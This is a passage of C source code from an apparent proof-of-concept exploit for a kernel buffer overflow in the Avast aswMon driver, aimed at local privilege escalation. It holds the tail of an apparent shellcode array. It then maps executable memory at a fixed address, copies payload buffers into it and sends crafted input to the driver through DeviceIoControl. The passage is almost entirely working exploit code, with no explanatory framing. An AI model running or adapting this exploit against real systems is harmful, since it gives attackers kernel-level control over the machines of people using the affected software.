0x699918e3, 0xde22536a, 0xfae6dd7c, 0x8a228eab, 0xf657ae31, 0x97d59acb, 0xb1f6e1b7, 0xbc41be1c, 0xc2572c95, 0x342f56a9, 0x349aeff3, 0xcbe3c7d9, 0x080d46fe, 0x0e1d753c, 0xe4760d5c, 0x0cde715c, 0x7d129f23, 0xab63fbbe, 0x9d734af8, 0xc2daebce, 0x0619e8ee, 0x2c5b3a41, 0xd5db4193, 0x943fce43, 0x0256feeb, 0x83a424bd, 0xe27f259b, 0x67ef724b, 0x99c97ae1, 0x8bfa552e, 0x73e3191c, 0xe94365e5, 0x92291d29, 0x7a28b911, 0x4ae8b691, 0xafba0345, 0xbac0a0ba, 0x677713c2, 0x1a7fc599, 0x8978a9c1, 0xe8f62f56, 0x58f7969a }; DWORD ShellcodeToExecute; int choix; memset(welcome, 0x61, 100); welcome[100] = 0; ZeroMemory(out,sizeof(out)); printf("Avast Kernel Buffer Overflow Vulnerability\nProof Of Concept...\n\n"); getch(); MajShellcode("LocalEscalation_Avast.exe"); MajRealShellcode(); MajRealStack(); ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_RESERVE, PAGE_EXECUTE_READWRITE); ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy((void*)0x57523c00, UpdateAswMon, sizeof(UpdateAswMon)); memcpy((void*)0x57523c00+sizeof(UpdateAswMon), ShellcodeMaster, sizeof(ShellcodeMaster)); printf("Connecting... "); hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); while(hDevice == (HANDLE) 0xffffffff){ hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); Sleep(1000); } printf("Found !\nHandle : %p\n",hDevice); DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL); DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL); AfficherListeFichiers(); printf("Written.\n"); CloseHandle(hDevice); getch(); return 0; }